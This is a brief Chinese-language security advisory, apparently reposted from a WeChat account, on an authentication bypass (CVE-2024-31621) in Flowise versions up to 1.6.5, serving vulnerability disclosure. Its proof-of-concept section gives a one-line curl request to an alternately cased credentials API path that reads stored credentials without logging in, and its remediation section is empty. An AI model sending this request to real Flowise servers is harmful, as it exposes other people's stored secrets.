-
CVE-2024-31621
-
中危
FlowiseAI是一个强大的开源项目,致力于简化和自动化业务流程,提高工作效率。该项目结合了人工智能与工作流引擎,为用户提供了一种直观、可扩展的方式来设计、执行和监控复杂的工作流程。
-
flowise <= 1.6.5
0x05 POC
curl http://{url}/Api/v1/credentials
0x06 修复建议
原文始发于微信公众号(浅安安全):漏洞预警 | Flowise身份认证绕过漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论